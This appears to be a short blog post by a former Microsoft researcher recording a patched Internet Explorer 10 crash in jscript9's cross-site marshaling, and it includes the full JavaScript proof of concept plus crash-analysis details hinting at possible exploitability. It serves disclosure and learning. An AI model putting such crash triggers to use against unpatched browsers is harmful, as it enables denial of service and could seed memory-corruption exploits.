IE10 DoS: Cached document.links Collection After Redirect Crashes in jscript9 CrossSite Marshal

I found that injecting elements into a window before its server redirect and caching the document.links collection caused a crash when the cached collection was accessed after the redirect, as jscript9!Js::CrossSite::MarshalVar attempted to marshal a stale cross-site reference with invalid internal state.

var cachedLinks;
function main()
{
    var win = window.open("redirect.aspx","","width=200,height=200");

    win.setTimeout('alert("Please, do not close this alert, just wait 4 seconds until bing loads...")');
    
    var myDiv = win.document.createElement("div");
    win.document.appendChild(myDiv);

    myDiv.innerHTML = '<a href="1">AA</a><a href="1">AA</a>';

    cachedLinks = win.document.links;

    setTimeout('accessWindowDOM()', 4000);
}
function accessWindowDOM()
{
    alert(cachedLinks[0].outerHTML); // Crash!
}

After the redirect, cachedLinks[0].outerHTML triggered a cross-site marshaling attempt in jscript9!Js::CrossSite::MarshalVar+0x19, which read from an invalid pointer at offset 0x644. The fault was rated UNKNOWN exploitability with the note that data from the faulting address controls branch selection.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 DoS: pushState to mhtml: URL Then window.open Crashes in urlmon StrCmpCW] :: [IE10: X-Frame-Options Header Bypassed via mhtml: Protocol in Sandboxed iframe] >